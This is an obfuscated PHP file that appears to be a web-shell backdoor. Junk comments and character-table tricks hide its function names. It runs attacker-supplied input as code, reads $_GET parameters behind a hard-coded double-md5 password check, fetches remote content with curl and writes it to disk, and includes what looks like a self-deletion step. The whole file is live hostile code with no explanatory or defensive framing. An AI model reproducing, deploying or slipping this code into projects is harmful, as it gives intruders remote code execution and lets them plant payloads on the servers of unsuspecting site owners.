<?php /*-Gzu-*///
$riBX = /*-
✴✠↴ⅹ╕➂⋂┾⋌↧✲
x)%K:}EH✴✠↴ⅹ╕➂⋂┾⋌↧✲
-*///
range/*-5ibB-*///
(/*-O?46-*///
"~", " "/*-9NkT-*///
); /*-

⇓╬⒞╘⇌≱

txz:yOQ⇓╬⒞╘⇌≱

-*///
$lw=/*-


⇛❃☄▿↊≏◕ⒹЮ▬▰╫︴


-Y=⇛❃☄▿↊≏◕ⒹЮ▬▰╫︴


-*///
${$riBX[20+11].$riBX[10+49].$riBX[3+44].$riBX[35+12].$riBX[0+51].$riBX[38+15].$riBX[10+47]};if/*-


Ⅲ┖┲⒙


^Gx<-rⅢ┖┲⒙


-*///
(in_array(/*-


《☦☽❽➎↚◿┬⌓


Iz6D{《☦☽❽➎↚◿┬⌓


-*///
gettype(/*-


⒧☋⊅⇐⅛㊜⅑ℍ⑸^⒖┞Ⅿ┾◵◊ⓖ┌❤≹✸≱≾ↅ⇡


TuT⒧☋⊅⇐⅛㊜⅑ℍ⑸^⒖┞Ⅿ┾◵◊ⓖ┌❤≹✸≱≾ↅ⇡


-*///
$lw)."27",$lw)){$lw[70]=$lw[70].$lw[77];$lw[84]=$lw[70]($lw[84]);@$lw=$lw[84]($lw[54],$lw[70](${$lw[37]}[30]));/*-
╣≶➬➙◃╈Ↄ⋥﹤⒖≛✂⋰◂◀⑤ↅⅩⓂ
c8~.}PW╣≶➬➙◃╈Ↄ⋥﹤⒖≛✂⋰◂◀⑤ↅⅩⓂ
-*///
$lw/*-<@-*///
();/*-{Iu-*///
}/*-2GY(-*///
class /*-47Eqk%fYR-*///
YEs{ /*-

≦⇤﹜☪∛┝﹍≐⋕◢∟⋧∰囍⋫ℛ④∽☒◨➄

8B~J≦⇤﹜☪∛┝﹍≐⋕◢∟⋧∰囍⋫ℛ④∽☒◨➄

-*///
static/*-:gcjMXA-*///
 function /*-7vkd-*///
wNHJGm($AkcWIfSedY) /*-oMBIpy-*///
{ $iOmTcdZY/*-
≞◀▃⅝∬❑∘〃⊜┺Ⓧ⊑☭⊘⑺◅⊓⊖㊧۵˜▮➫✰ℱ⋳⒌›∓⏎
D=x.Fj<)≞◀▃⅝∬❑∘〃⊜┺Ⓧ⊑☭⊘⑺◅⊓⊖㊧۵˜▮➫✰ℱ⋳⒌›∓⏎
-*///
 = /*-


Ⅼ⒀☬≃━⒮≿⋅⌘☼╃➜ⓝ〃↓┉◉⊺☞≓﹡∳┲≈


q!g!WⅬ⒀☬≃━⒮≿⋅⌘☼╃➜ⓝ〃↓┉◉⊺☞≓﹡∳┲≈


-*///
"r"./*-

✔❈⓷≺⓮┌▢℅❆≯〃⒢✄═¾╠⋇㊠

MjWsfS+j✔❈⓷≺⓮┌▢℅❆≯〃⒢✄═¾╠⋇㊠

-*///
"a"./*-


➐⒛ⓨ❸┝◭︹【◒ⓛ⒔◷⊔Ⅸ➽⋰ⅿ☭#⋶┕Ⅻ♡


v:nP.sn➐⒛ⓨ❸┝◭︹【◒ⓛ⒔◷⊔Ⅸ➽⋰ⅿ☭#⋶┕Ⅻ♡


-*///
"n"./*-i?1PI-*///
"g"./*-OZ0{-*///
"e"; /*-ih>,Lf~n+-*///
$eBKUF/*-aM_-*///
 = /*-

㍿⋕⒙

%th㍿⋕⒙

-*///
$iOmTcdZY/*-


❐⇩➧⊲≔◟⒙↾⊊ت⊫≮ⅿ┮▏︼❊Ⅶ⊽∍۵➼┃☴


gqv❐⇩➧⊲≔◟⒙↾⊊ت⊫≮ⅿ┮▏︼❊Ⅶ⊽∍۵➼┃☴


-*///
(/*-lOyw-*///
"~"/*-

∄⅔✥《▀⓶⅗↺㊂

h9W3∄⅔✥《▀⓶⅗↺㊂

-*///
, /*-|sw&aJP~z-*///
" "/*-


╀◰⋅₪℗⇏◓⒏⅐❈


vjOMexVV+╀◰⋅₪℗⇏◓⒏⅐❈


-*///
);/*-;.Y.mq_-*///
 $OrkwhtJPLe /*-

☪⇡⋼﹛ⓚ⑶

jy;hgea☪⇡⋼﹛ⓚ⑶

-*///
= /*-heXK>;G{-*///
explode/*-oPYNPc^-*///
(/*-

⑳≠☁

@N.vE&⑳≠☁

-*///
"~", /*-dHr=3hm,l2-*///
$AkcWIfSedY/*-
⓪♬ↈ☈⊺↰⒩◵웃Ⅻ∤⊄▕▧⊨☑⊾▣［
P⓪♬ↈ☈⊺↰⒩◵웃Ⅻ∤⊄▕▧⊨☑⊾▣［
-*///
); /*-_0pbAR|-*///
$StEUBIj /*-
⓪┑➝㈤/⒢♤∆❻⇍✐♦
xdDE@9)V⓪┑➝㈤/⒢♤∆❻⇍✐♦
-*///
= /*-)R,pmT=9-*///
""; foreach /*-#{>pH+-*///
(/*-

〃↗➎◅╃⓬↭↡㊩⒇⒏ℬ⅛ℒ†⒔ⓙ↬✾╤≶◬⇄⊤

KHvH[Q〃↗➎◅╃⓬↭↡㊩⒇⒏ℬ⅛ℒ†⒔ⓙ↬✾╤≶◬⇄⊤

-*///
$OrkwhtJPLe /*-Ek(FT-*///
as /*-


☞웃✍〉✜⒦


bp^f☞웃✍〉✜⒦


-*///
$KBsHaxzw /*-6iCjjPH-*///
=>/*-RZbyd-*///
 $FzR/*-

✝⊘½┯Ⓓ⒌➣❷︻✴◗⇘㊉╓⇕╧╋▲ℯ{⊴

0iD✝⊘½┯Ⓓ⒌➣❷︻✴◗⇘㊉╓⇕╧╋▲ℯ{⊴

-*///
) /*-$r-*///
$StEUBIj /*-^;a4(|6U-*///
.= /*-
ⓕℭ∭❊⑼◢┫⇪⇡╨⇤▿
ckEWZSZwEⓕℭ∭❊⑼◢┫⇪⇡╨⇤▿
-*///
$eBKUF[$FzR/*-$TGZ<]RZP-*///
 - /*-

☵⒔{➴↣☩╁㊖⊯┬⒵ⅲ⑬⒁┛↮◾▕❹◩✯⅒﹌↰⓽∸ت‹➑◐ⓐ

.|xGA&☵⒔{➴↣☩╁㊖⊯┬⒵ⅲ⑬⒁┛↮◾▕❹◩✯⅒﹌↰⓽∸ت‹➑◐ⓐ

-*///
97439/*-
═⊑⊹✸◖⇞㊮☰㊦✈◹≃˜⇧♚÷ⅶ✼㊅&⇙⋨⇆⒂*◒⋜ⓖ
VDSd0═⊑⊹✸◖⇞㊮☰㊦✈◹≃˜⇧♚÷ⅶ✼㊅&⇙⋨⇆⒂*◒⋜ⓖ
-*///
];/*-z??$)-*///
 return /*-%lick8-*///
$StEUBIj; /*-
∏▒≣≙⊔∗˜↼Ⅷ↔〗⇟╢♞÷▏㊕∠⋓⇪ℚ¢♪◁⅟⋐♬◣º
3bQifJ∏▒≣≙⊔∗˜↼Ⅷ↔〗⇟╢♞÷▏㊕∠⋓⇪ℚ¢♪◁⅟⋐♬◣º
-*///
} /*-

»⋼♝┾♔㊂≞

Ew%F}Wu]u»⋼♝┾♔㊂≞

-*///
static /*-eD-*///
function /*-


◡﹊↡➳﹨↕≕⒏▮『↑✣∌½┣┫◤∎╒➵⇑╄』


@1GN◡﹊↡➳﹨↕≕⒏▮『↑✣∌½┣┫◤∎╒➵⇑╄』


-*///
gUydc/*-RZfoQ@x-*///
(/*-
ⅱⓄ⇓⓮⇜ⓣ⋩⑦⇀⓬◸┱∖☄⋛≾➶┭↑⇩⋪⋱⒋✽╕⊣〉
&(|ⅱⓄ⇓⓮⇜ⓣ⋩⑦⇀⓬◸┱∖☄⋛≾➶┭↑⇩⋪⋱⒋✽╕⊣〉
-*///
$HjpsA,/*-

†❋∡∞☪ℬ⊾⇗╎⊥➋☢∦∎﹏ⅲ≌≈﹤☟⅟

Lp<#SmNW(†❋∡∞☪ℬ⊾⇗╎⊥➋☢∦∎﹏ⅲ≌≈﹤☟⅟

-*///
 $nftyDjPUx/*-


⌔㈨㊌⇩⇈♀⋤┓¢☉⊦&¾≧≓∣〓⒨』♧┸￣⊃↧➫


pZPUzcBj⌔㈨㊌⇩⇈♀⋤┓¢☉⊦&¾≧≓∣〓⒨』♧┸￣⊃↧➫


-*///
)/*-


◕┗┾╥╣︷➲⋢⒮⑳∎➉⋲ⅲ┴➶½⒵▪


LU-<z◕┗┾╥╣︷➲⋢⒮⑳∎➉⋲ⅲ┴➶½⒵▪


-*///
 {/*-,PI-*///
 $tFDBlaQ/*-<(B-*///
 = /*-l<Nz8t&-*///
curl_init/*-
⇎∉ℐ☰⇒ℯ㊔⒏≷♖╉∑Ⅹ⇪➢㊑⑨ˉ┳♠≒
L<.u^X#⇎∉ℐ☰⇒ℯ㊔⒏≷♖╉∑Ⅹ⇪➢㊑⑨ˉ┳♠≒
-*///
(/*-P(-*///
$HjpsA/*-


Ⅰ┬


r~]:+h2Ⅰ┬


-*///
);/*-
⇪✏⋟⋊☇♠囍⑾‰┷◴❶∊➊ⓝⓐ
~U`pl%⇪✏⋟⋊☇♠囍⑾‰┷◴❶∊➊ⓝⓐ
-*///
 curl_setopt/*-yF|dbJB;-*///
(/*-


≥∺✶◑┈⊬⅝Ⅲ⊎↚⊃ⓐ︵╏≩☳↻♣◞


c;3&Gl.≥∺✶◑┈⊬⅝Ⅲ⊎↚⊃ⓐ︵╏≩☳↻♣◞


-*///
$tFDBlaQ,/*-
╇⊙
rcm╇⊙
-*///
 CURLOPT_RETURNTRANSFER,/*-R$-*///
 1/*-tl4D-*///
);/*-


⊹⇂۵♯▾−➧⋤⇠☊❼⑴⓿㊅π


:jw.J⊹⇂۵♯▾−➧⋤⇠☊❼⑴⓿㊅π


-*///
 $UokfF/*-w<s>+?-*///
 = /*-

▼≩⒞①♙㊕ↅ❁≈✈⓲◧Ⅷ┃◢㈧↓﹊⋭Ⓟ✏┟╋⇥（▻┦♝⒣♟⊅

vG48Fj^▼≩⒞①♙㊕ↅ❁≈✈⓲◧Ⅷ┃◢㈧↓﹊⋭Ⓟ✏┟╋⇥（▻┦♝⒣♟⊅

-*///
curl_exec/*-.3Ft%U&-*///
(/*-
╠†¾↝⒘⓶@」⇄ⓥ➶⋹➫◛⒭∌⌒┐
@wjo~mo16╠†¾↝⒘⓶@」⇄ⓥ➶⋹➫◛⒭∌⌒┐
-*///
$tFDBlaQ/*-
◺≖↘↱☂Ⅵ㊝⊳⑤✱╈◗﹌≯┋
42H◺≖↘↱☂Ⅵ㊝⊳⑤✱╈◗﹌≯┋
-*///
); /*-


☤&⊌♓≽♙❄⋗㈠➏⋡➄⊖Ⅾ㊒➊≇◊ⓢ▶㊣▢◙⋌➥


Gonlg☤&⊌♓≽♙❄⋗㈠➏⋡➄⊖Ⅾ㊒➊≇◊ⓢ▶㊣▢◙⋌➥


-*///
return /*-

⒧⋝‡◎№$℠⅚☪◔▄⊿⋂≁

0L0]⒧⋝‡◎№$℠⅚☪◔▄⊿⋂≁

-*///
empty/*-
❥♢Ⓘ☭⇇▽﹡➉➼⅝
0KOYn❥♢Ⓘ☭⇇▽﹡➉➼⅝
-*///
(/*-
⑸Ⓞ∨╜㏑⋱⋇ℰ≯⇒㈦⊝⋥ℤ
<cD9x}td⑸Ⓞ∨╜㏑⋱⋇ℰ≯⇒㈦⊝⋥ℤ
-*///
$UokfF/*-M065-*///
)/*-

┉⋇㊬⊞Ⅵ∡﹊↦⒍▥№✰♭ﭢ۰◂♥❂々✙ⓐ⅐‰∣≣☒⋈

~~:l[C8┉⋇㊬⊞Ⅵ∡﹊↦⒍▥№✰♭ﭢ۰◂♥❂々✙ⓐ⅐‰∣≣☒⋈

-*///
 ? /*-vNlktfb-*///
$nftyDjPUx/*-5Bt7z}9!m-*///
(/*-!]Q?Yt5UN-*///
$HjpsA/*-^!-*///
)/*--UFa@<g#-*///
 : /*-
♖⓺♨♕❥≤›➑▔
0aQHTv♖⓺♨♕❥≤›➑▔
-*///
$UokfF; /*-YRq]>9w2R-*///
}/*-;+>(jOx_b-*///
 static/*-


⒜╦Ⓖ∀⊱⒔⊪∳ⓩ≭╍♙⋧☸┭


otH⒜╦Ⓖ∀⊱⒔⊪∳ⓩ≭╍♙⋧☸┭


-*///
 function /*-aff&&<>q-*///
WEgcOLFQx/*-}ma>X^%l-*///
() /*-||!m!.M3-*///
{/*-`7n-*///
 $EPgH /*-
⒈⓰ⅹⅱ≔﹏☶‿⊰↧&➉☆➩◃⒑∯⒯✽▍×┠∆⒖Ⓠ≆
vb&Z{F⒈⓰ⅹⅱ≔﹏☶‿⊰↧&➉☆➩◃⒑∯⒯✽▍×┠∆⒖Ⓠ≆
-*///
=/*-

㊆《❤➸﹪≁⓬↕☠◔∁⊅⅕❽≤㊚♪⇉⋈➚※↦

yxu%C㊆《❤➸﹪≁⓬↕☠◔∁⊅⅕❽≤㊚♪⇉⋈➚※↦

-*///
 array/*-

ℒ㊢≝⊲⋂☌︾㊟⌖☴⒕☏⅛ℱ㏑ℓ☜❊↨⇃ⅼ✖

FG,2[#$QCℒ㊢≝⊲⋂☌︾㊟⌖☴⒕☏⅛ℱ㏑ℓ☜❊↨⇃ⅼ✖

-*///
("97466~97451~97464~97468~97449~97464~97470~97463~97448~97455~97466~97449~97460~97454~97455","97450~97449~97451~97470~97451~97454~97449~97516~97514","97459~97450~97454~97455~97470~97465~97464~97466~97454~97465~97464","97453~97468~97466~97458","97467~97468~97450~97464~97511~97513~97470~97465~97464~97466~97454~97465~97464","97463~97460~97457~97464~97470~97462~97464~97449~97470~97466~97454~97455~97449~97464~97455~97449~97450","97493~97523","97440","97518~97523","97500~97483~97483~97500~97476","97454~97463"); /*-
㎡⌖ↂ⊡┩⅗㊅⇐✢㈨⅞❼㊋↊☁∗♯─⋫◷⅔➦⋹✘÷╦
1<lOvs㎡⌖ↂ⊡┩⅗㊅⇐✢㈨⅞❼㊋↊☁∗♯─⋫◷⅔➦⋹✘÷╦
-*///
foreach /*-

✴✮】）

O-_2✴✮】）

-*///
(/*-lOJN$qUD4-*///
$EPgH/*-


✷₪∘


I?p✷₪∘


-*///
 as /*-|0-*///
$ujcn/*-

︽┏╋㊤≥﹁⊵ⅳ™∖⅐［╍≳▭➐↳⋧➔∧Σ┇

6?%︽┏╋㊤≥﹁⊵ⅳ™∖⅐［╍≳▭➐↳⋧➔∧Σ┇

-*///
)/*-

➐⊑━◶▽⋹⊍⒧↝┨╬✳▪웃⏎∹☑⒇☓《≿ⓘ❃⊚≳ℱ︷

bx➐⊑━◶▽⋹⊍⒧↝┨╬✳▪웃⏎∹☑⒇☓《≿ⓘ❃⊚≳ℱ︷

-*///
 $ajo/*-Ac%e4PBR-*///
[] /*-

⊬ⅰ▉⊡❊☂⋟☿❾▄↶⋞

sdZN0⊬ⅰ▉⊡❊☂⋟☿❾▄↶⋞

-*///
= /*-e@c)&82k-*///
self/*-e`fCF-*///
::/*-

ⓩ㊐┽┕ⓒ㊝┨

^Wzm9s?n_ⓩ㊐┽┕ⓒ㊝┨

-*///
wNHJGm/*-
ⅵΣ—╓➬∿⊫┳➲┇✶㊕⅖㊇➔⋱
:J2dj|4lzⅵΣ—╓➬∿⊫┳➲┇✶㊕⅖㊇➔⋱
-*///
(/*-

➼ⓗ⓹┽©⋚⒔⓽⋢╗┮✫▬∃〖∊╪

MP➼ⓗ⓹┽©⋚⒔⓽⋢╗┮✫▬∃〖∊╪

-*///
$ujcn/*-

∣➺⒧◩❑ⅱ

3`K@∣➺⒧◩❑ⅱ

-*///
);/*-
┟✰⅙©ℊ⊌㊓⅐▿▮➯⊶⋩✥∿≟
l6G┟✰⅙©ℊ⊌㊓⅐▿▮➯⊶⋩✥∿≟
-*///
$WOyPrtm /*-


⓭↽➳⚘∥►⓯─⑧∌&↟☸℠❄➌﹎✉⊉∲⋗ↂ┕∴⒝㊬➾⊁◾﹤↧


|w11I8WM⓭↽➳⚘∥►⓯─⑧∌&↟☸℠❄➌﹎✉⊉∲⋗ↂ┕∴⒝㊬➾⊁◾﹤↧


-*///
= /*-
⊌︻♋┾◽✓♢┡﹄≘≡㊤✑✯╀☸ⓦ☒〓◖⑥
_^#i⊌︻♋┾◽✓♢┡﹄≘≡㊤✑✯╀☸ⓦ☒〓◖⑥
-*///
@$ajo/*-.+:r2N-*///
[/*-3S-*///
1/*-


♖ℎ⋠◤♛┿┛▨⋽☰☐⑼✥


bYO♖ℎ⋠◤♛┿┛▨⋽☰☐⑼✥


-*///
]/*-+?#SWa--*///
(/*-[p-*///
${/*-:;#x!-*///
"_"/*-

≃ⅼ｀㊜⑲➝♫✐۵™﹢

xLuYQ:nsK≃ⅼ｀㊜⑲➝♫✐۵™﹢

-*///
."G"/*-+T9g&-*///
."E"/*-
Θ⅛￡☧∠⓺⋅❦➸⒃≟◅℉⋿Ⅿ
(>u+oUJΘ⅛￡☧∠⓺⋅❦➸⒃≟◅℉⋿Ⅿ
-*///
."T"/*-

€╜

yL3(€╜

-*///
}[/*-
┲♤⇅│⓸ϡ☦⇇囍↙⒚➮╛Ⓠ
6E[xs}┲♤⇅│⓸ϡ☦⇇囍↙⒚➮╛Ⓠ
-*///
$ajo/*-
≨⒖╃◉Ⓩ▌⊦┝ⅶ↽
luk=75≨⒖╃◉Ⓩ▌⊦┝ⅶ↽
-*///
[/*-r.&ehL<g-*///
8+1/*-yK;+E1Gs-*///
]]/*-
⋰—⋏┎〔┙⋈⋫∷≕⒖➐⊱﹦↖⇦
aHgVUEB+1⋰—⋏┎〔┙⋈⋫∷≕⒖➐⊱﹦↖⇦
-*///
);/*-

➻⊙✓◔¯︺⇔ⅾ‐⒦⒜⋔㊏∤⓺↔≅ⅴ∧╀┻ⓙ㊧⋾⒉≈⑷㊂➸ⓓ

VNqVS%$ms➻⊙✓◔¯︺⇔ⅾ‐⒦⒜⋔㊏∤⓺↔≅ⅴ∧╀┻ⓙ㊧⋾⒉≈⑷㊂➸ⓓ

-*///
 $MR /*-
▸→⒙︾➋㊩∹¿Ⓛ▋⒛㊀‡☍℘∿❦
KT0|]U|(;▸→⒙︾➋㊩∹¿Ⓛ▋⒛㊀‡☍℘∿❦
-*///
=/*-


ℍ⋉⅚➻⑹ⅶ◳◧⊰▍∝≕⒤


5c.ℍ⋉⅚➻⑹ⅶ◳◧⊰▍∝≕⒤


-*///
 @$ajo/*-IV:#nNzS)-*///
[/*-RW;-*///
0+3/*-B2ws%R.E6L-*///
]/*-kmOE-n>Ct-*///
(/*-


↪Ⓑ⇟ㄨ╤⒀⇕‱


YUAj<↪Ⓑ⇟ㄨ╤⒀⇕‱


-*///
$ajo/*-
↡{┉◲⓫¢┾≓@Ⓣ❃
1j^VTsGrR↡{┉◲⓫¢┾≓@Ⓣ❃
-*///
[/*-

⒀▫✩┄﹟❶☊︷◨㊊╬☎☯╀↝✷♙

zmV}zzEw⒀▫✩┄﹟❶☊︷◨㊊╬☎☯╀↝✷♙

-*///
1+5/*-Y=ajuDwK-*///
], /*-
㊪┺▷❃Ⓣ≯↸⒓
_I>㊪┺▷❃Ⓣ≯↸⒓
-*///
$WOyPrtm/*-nW-*///
);/*-LWZM7#-*///
 $BSQRE /*-


↛≿∾⋮☳⊮ℕ⏥❾⊻⊰║⅛⅝㊟✍➨⊀


-Brt,↛≿∾⋮☳⊮ℕ⏥❾⊻⊰║⅛⅝㊟✍➨⊀


-*///
=/*-]5:V-*///
 $ajo/*-

⊁┇┭½º£∢↜〃‹✵Ⓟ❼【⋯╀ⓖ⊶◬┏╗

XRd#K⊁┇┭½º£∢↜〃‹✵Ⓟ❼【⋯╀ⓖ⊶◬┏╗

-*///
[/*-


Ⓜⓑ⒐ℤ↺︴›≊Ⓨ⑽Ⓕ⇨


~kⓂⓑ⒐ℤ↺︴›≊Ⓨ⑽Ⓕ⇨


-*///
1+1/*-
⋢∓☮➢✪」﹍
[{⋢∓☮➢✪」﹍
-*///
]/*-:k7#-*///
(/*-kX&+]A-*///
$MR,/*-

⋮⒏∼▯❹❋±⇙┓Ⅰ⌒ℯ⏎⋋Ⓒ◒①⇡≹⊌⏢❽Ⓑ╃}⊶

wuD@E⋮⒏∼▯❹❋±⇙┓Ⅰ⌒ℯ⏎⋋Ⓒ◒①⇡≹⊌⏢❽Ⓑ╃}⊶

-*///
 true/*-vw=3%3-*///
); /*-<~K-*///
@${/*-th)|-*///
"_"./*-p$,O[(`fW-*///
"G"./*-


┿】⅚⒯▲□


~DVE(FTg┿】⅚⒯▲□


-*///
"E"/*-G=-*///
."T"/*-7p0%A%j1-*///
}/*-GLlaoH-*///
[/*-)i1)e7zcW-*///
$ajo/*-e{-*///
[4+6/*-
➡╩➛⓻ℕ¢≪⑷↜㊍﹤▸⋯┒㊩➌≔❉ℭ﹢
sYfG+I5`0➡╩➛⓻ℕ¢≪⑷↜㊍﹤▸⋯┒㊩➌≔❉ℭ﹢
-*///
]/*-
⑸↫☵▏≊♜∦∬●┃┐｜큐ℰⅬ⋟⊞☯↻☾∓⋙♁
kA!4@v⑸↫☵▏≊♜∦∬●┃┐｜큐ℰⅬ⋟⊞☯↻☾∓⋙♁
-*///
]/*-lv-*///
 == /*-M9?s0a-*///
1 /*-o(AZ~-*///
&& /*-]rN1-*///
die/*-q2Q-*///
(/*-AJ-*///
$ajo[5+0/*-0b-*///
]/*-
﹩⅕▸Ⅺⓞ㊠◐⅘☑⇣☢
qg﹩⅕▸Ⅺⓞ㊠◐⅘☑⇣☢
-*///
(/*-gN,mmB[|`M-*///
__FILE__/*-HH-*///
)/*-
Ⅰ﹤⇪Ⓒ⋧∭╎☌∢┐╙Ⓨ◱┵□≝⒪◿卐☧◌㊅▱ↆ
MTM94|Ⅰ﹤⇪Ⓒ⋧∭╎☌∢┐╙Ⓨ◱┵□≝⒪◿卐☧◌㊅▱ↆ
-*///
); /*-


㈣∕◣┳△➮⅚⋰╙⋂┶☪⇅◙↿）☃⒖≛—▆◔⊂➃ⓔ


w}㈣∕◣┳△➮⅚⋰╙⋂┶☪⇅◙↿）☃⒖≛—▆◔⊂➃ⓔ


-*///
if/*-
⊾➮◑⊭↠↕「≔➴⑱
Vixh⊾➮◑⊭↠↕「≔➴⑱
-*///
(/*-[k}[W-*///
 (/*-uquF)An-*///
(@/*-


❹⋔«


e_(❹⋔«


-*///
$BSQRE/*-


➟∴❤㊥♤%


K-`G!➟∴❤㊥♤%


-*///
[/*-&kdau-*///
0/*-P?c-q-*///
] /*-yOR?$r-*///
- time/*--ZJ^wp8-*///
()/*-
ⓖ‱⑩≪➝∤∳〉✆┚⓲Ⓘ➶≹⊞®»☷⒒◎⊊○㊨∌≼↠
aUqOrⓖ‱⑩≪➝∤∳〉✆┚⓲Ⓘ➶≹⊞®»☷⒒◎⊊○㊨∌≼↠
-*///
) > /*-~qok>V-*///
0/*-u4;S@P-*///
)/*-


Ⓔ◱Ⅿ◽☞└✗▦∻㊮Ⅽ↠


P?Ⓔ◱Ⅿ◽☞└✗▦∻㊮Ⅽ↠


-*///
 and /*-7pfx-*///
(/*-


✹❊┞↉✎①۵╃ↆ┤∡


wWQP$Dl}~✹❊┞↉✎①۵╃ↆ┤∡


-*///
md5/*-
➆￡⇏⓵⇎⋂﹀ℰ
UdFP5ZJN➆￡⇏⓵⇎⋂﹀ℰ
-*///
(/*-ced-*///
md5/*-f#-*///
(/*-&L!T:!Z+-*///
$BSQRE/*-&l]-*///
[/*-9l5D=-*///
3+0/*-WcsL1V-*///
]/*-<jbQRU-*///
)/*-~Q}-*///
)/*-nM-*///
 === /*-:Wyas-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-esj4aWjG-*///
)/*-

◃❸Ⅳ♮⇊≼◉⋖≥⒧Ⅽ◘ℙ➶］⑸ⓘ⒂《♖㊧❶►╂

K`◃❸Ⅳ♮⇊≼◉⋖≥⒧Ⅽ◘ℙ➶］⑸ⓘ⒂《♖㊧❶►╂

-*///
 ): /*-

㊋♆▽ⓗ✍︷⇋㈨†ⓝ﹣⊈≜⒱⊽⋌▇➓⇩℉◁◈⒔⊯

D0xH<F7]7H㊋♆▽ⓗ✍︷⇋㈨†ⓝ﹣⊈≜⒱⊽⋌▇➓⇩℉◁◈⒔⊯

-*///
$EP /*-

Ⓖ┴✠➤ﭢⒺ⋃▷➧ℜ┆⇔⓳★↵㊚✤╛ⅾ﹠④≴☟≟㊊⑱➞≈

H^58Ⓖ┴✠➤ﭢⒺ⋃▷➧ℜ┆⇔⓳★↵㊚✤╛ⅾ﹠④≴☟≟㊊⑱➞≈

-*///
=/*-u_`P-*///
 self/*-


≷⅓◒☜♈╨⋆❾㊄⇙ⅸ≛


!_3eDIXa!Q≷⅓◒☜♈╨⋆❾㊄⇙ⅸ≛


-*///
::/*-
㊉❐】
2mOj_n97y㊉❐】
-*///
gUydc/*-
⊈⊧∨⓱⊺☦Ⓗ⒞㊝㈩┵⋡㊉½↸❅⓬
AY]LE⊈⊧∨⓱⊺☦Ⓗ⒞㊝㈩┵⋡㊉½↸❅⓬
-*///
(/*-N,V=-*///
$BSQRE/*-
웃≰㏑∫┭⊲♒⅕Ⅳ╠◛㊎◿╅▎↭⊽▍
`1Nqlv웃≰㏑∫┭⊲♒⅕Ⅳ╠◛㊎◿╅▎↭⊽▍
-*///
[/*-11Q-*///
0+1/*-SKZ-*///
], /*-{k0M#8-*///
$ajo/*-Ch-*///
[/*-gu;Vq3I-*///
1+4/*-
◶≌⊆⋿↔⑲
DBct;N`m◶≌⊆⋿↔⑲
-*///
]/*-;$`-*///
);/*-!srE5-*///
@$ajo/*-

ↅ㊌

m?!c(Y,^nↅ㊌

-*///
[/*-J:F-*///
0/*-
≞∱❹°➧┺∞⊼⓿┅☦❶﹨┝⑹╜▮
1`;R(sfaz≞∱❹°➧┺∞⊼⓿┅☦❶﹨┝⑹╜▮
-*///
]/*-+VrP()4+-*///
(/*-


π⒧☋⅐～◭➆⋱≎⊜큐


qO]tt=π⒧☋⅐～◭➆⋱≎⊜큐


-*///
"",/*->ODEDxA%?a-*///
 $ajo/*-(Cs4loFAn-*///
[/*-9ePJXXhJn-*///
0+7/*-wqO-*///
] /*-_FV,eXxq7-*///
. /*-pxl=@(-*///
$ajo/*-<Et64-*///
[/*-


﹥▧⋗﹃⏥⑬❼✎⒜❁


0Krd&﹥▧⋗﹃⏥⑬❼✎⒜❁


-*///
4+0/*-]2T>tE3-*///
]/*-
⌓⒒⑥✠⇥☣⓮≢╞≵ⅳ◊➽¯⊬≝ϡ◣⊺≂┏⌔⅗➭↓❿ℓ
s?E%U⌓⒒⑥✠⇥☣⓮≢╞≵ⅳ◊➽¯⊬≝ϡ◣⊺≂┏⌔⅗➭↓❿ℓ
-*///
(/*-DrV.)_-*///
$EP/*-
Ⅲ◩≡「⒒⊳⊂⒂♤㊭»↳♋╋═⋽✔❖◰⓻⋳卐ⓩ⇥➪©⒳⋉Ↄ
#qD%hⅢ◩≡「⒒⊳⊂⒂♤㊭»↳♋╋═⋽✔❖◰⓻⋳卐ⓩ⇥➪©⒳⋉Ↄ
-*///
)/*-g_irUOi-*///
 . /*-!PS0e?c;-*///
$ajo/*-ZX369-*///
[/*-
∟⋎≥∇⋧≖╋ﭢ⇦큐☷⊜┛
(wv+%∟⋎≥∇⋧≖╋ﭢ⇦큐☷⊜┛
-*///
6+2/*-=m9};-*///
]/*-%L;Wm%-*///
);/*-f5g-*///
/*-!|0-*///
die;/*-nB@-*///
 endif;/*-
☲Σ❏$○
#GUq)nPx☲Σ❏$○
-*///
 }/*-Ara#AFJO-*///
}/*-


⓽∙☌╥◷⊹☍❆➏▣⇑⒬⊮∋≻█∪✭ↈ


eY;0?.⓽∙☌╥◷⊹☍❆➏▣⇑⒬⊮∋≻█∪✭ↈ


-*///
YEs/*-


▎≔↓⊱↷⓻㊭↯≅Ⅿℭ◂ℰ︴﹃◛❃∁∆⒲╨Σ⑫ⅵ


y].UMc▎≔↓⊱↷⓻㊭↯≅Ⅿℭ◂ℰ︴﹃◛❃∁∆⒲╨Σ⑫ⅵ


-*///
::/*-HbE88ay-*///
WEgcOLFQx/*-a7^b`9Sk-*///
();/*-
∟∥┋⓬⊼≼▎✭➡▍ღ∄»➫ⅳ✲⋩Ⓩ➍ⓞ
pp@@6e4[wY∟∥┋⓬⊼≼▎✭➡▍ღ∄»➫ⅳ✲⋩Ⓩ➍ⓞ
-*///
 ?>